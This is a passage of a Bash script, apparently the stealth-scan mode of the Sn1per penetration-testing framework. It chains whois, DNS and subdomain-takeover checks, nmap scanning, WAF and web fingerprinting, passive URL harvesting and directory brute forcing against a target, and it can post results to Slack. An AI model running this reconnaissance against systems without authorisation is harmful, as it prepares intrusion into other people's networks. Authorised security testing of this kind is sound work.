echo -e "$OKRED '\=====> ___< '\."
echo -e "$OKRED ./-----/ __________'\."
echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\'
echo -e "$OKRED '\=====> < ./'"
echo -e "$OKRED ./-----/ '> ./"
echo -e "$OKRED \. ___< ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./ Carl Pilcher"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED \. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\/"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[ Launching stealth scan: $TARGET $RESET"
echo -e "$OKGREEN $RESET"
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_stealth.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$WHOIS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
fi
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
mv -f *_ips.txt $LOOT_DIR/ips/ 2>/dev/null
if [[ $SCAN_TYPE == "DOMAIN" ]];
then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
echo ""
fi
source $INSTALL_DIR/modes/osint.sh
source $INSTALL_DIR/modes/recon.sh
cd $INSTALL_DIR
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -p $QUICK_PORTS $NMAP_OPTIONS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$HTTP_PROBE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PROBE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" | fprobe -c 200 -p xlarge | tee $LOOT_DIR/web/httprobe-$TARGET.txt 2> /dev/null
echo "$TARGET" | fprobe -c 200 -p xlarge -v | tee $LOOT_DIR/web/httprobe-$TARGET-verbose.txt 2> /dev/null
fi
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
if [[ -z "$port_80" ]];
then
echo -e "$OKRED + -- --=[ Port 80 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[ Port 80 opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
if [[ "$WAFWOOF" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
fi
if [[ "$WIG" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-http 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
echo " "
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau --subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:80 -l 1 -v n
cp -f /usr/share/blackwidow/"$TARGET"_80/"$TARGET"_80-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
if [[ "$WEB_BRUTE_STEALTHSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
egrep -v '<|>|;|(|)' $LOOT_DIR/web/robots-$TARGET-http.txt | tee $LOOT_DIR/web/robots-$TARGET-http.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80
fi
fi
if [[ -z "$port_443" ]];
then
echo -e "$OKRED + -- --=[ Port 443 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[ Port 443 opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
if [[ "$WAFWOOF" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https.raw > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
fi
if [[ "$WIG" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-https 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
fi
if [[ "$PASSIVE_SPIDER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
